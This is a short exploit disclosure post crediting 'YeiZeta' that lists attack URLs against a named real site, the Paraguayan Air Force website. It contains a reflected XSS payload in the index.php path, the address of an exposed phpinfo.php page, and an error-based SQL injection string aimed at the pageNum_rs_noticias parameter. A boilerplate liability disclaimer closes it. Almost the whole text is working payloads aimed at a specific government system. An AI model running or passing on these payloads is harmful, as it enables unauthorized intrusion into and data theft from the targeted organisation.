######################Exploit#######################
# Exploit Title: SQL/XSS/phpinfo() Fuerza Aera Paraguaya
#
# Exploit Author: YeiZeta
#
# Category: Web Application
#
##############################################
XSS
http://www.fuerzaaerea.mil.py/index.php/%22ns=%22theJoker(0x000136)%22%3E%3Ch1%3EXSS%20DETECT%20BY%20YEI%20ZETA%3C/h1%3E
phpinfo
http://www.fuerzaaerea.mil.py/phpinfo.php
SQL
http://www.fuerzaaerea.mil.py/index.php?pageNum_rs_noticias=-1
http://www.fuerzaaerea.mil.py/index.php?pageNum_rs_noticias=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&totalRows_rs_noticias=83&cod=index
##############################################
https://www.facebook.com/TheJokerHack
##############################################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information